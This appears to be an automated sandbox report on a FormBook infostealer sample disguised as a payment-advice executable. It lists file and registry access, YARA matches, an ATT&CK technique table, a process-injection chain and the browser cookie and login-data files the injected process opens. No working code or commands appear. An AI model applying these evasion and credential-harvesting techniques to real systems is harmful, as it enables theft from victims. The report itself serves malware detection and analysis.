                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara match, File source: 4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.2236251999.00000000019C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000009.00000002.3552776156.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000009.00000002.3552721887.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.3552365141.00000000014E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.2236407879.0000000002F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\finger.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\finger.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\finger.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\finger.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\finger.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\finger.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\finger.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\finger.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\finger.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match, File source: 4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 4.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.2236251999.00000000019C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000009.00000002.3552776156.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000009.00000002.3552721887.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.3552365141.00000000014E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.2236407879.0000000002F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

                [Behavior graph, image not included. Behavior Graph ID: 1571277, Sample: Payment Advice - Advice Ref..., Startdate: 09/12/2024, Architecture: WINDOWS, Score: 100. Process chain shown: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe starts a second instance of itself and powershell.exe (which starts conhost.exe); the second instance injects into vTCmFjyxUmdTJX.exe, which starts finger.exe; finger.exe injects into vTCmFjyxUmdTJX.exe and starts firefox.exe.]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe | 66% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook | |
| Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe | 39% | Virustotal | | Browse |
| Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe | 100% | Joe Sandbox ML | | |

                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://transip.nl/cp/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfinger.exe, 00000009.00000002.3554857180.00000000081C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.transip.nl/algemene-voorwaarden/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.emirates-visa.netvTCmFjyxUmdTJX.exe, 0000000A.00000002.3552365141.000000000153E000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.galapagosdesign.com/DPleasePayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000000.00000002.1886071216.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.transip.nl/vragen/198/finger.exe, 00000009.00000002.3554734232.0000000006780000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3553337559.000000000488A000.00000004.10000000.00040000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000002.3553049746.0000000003E1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      high
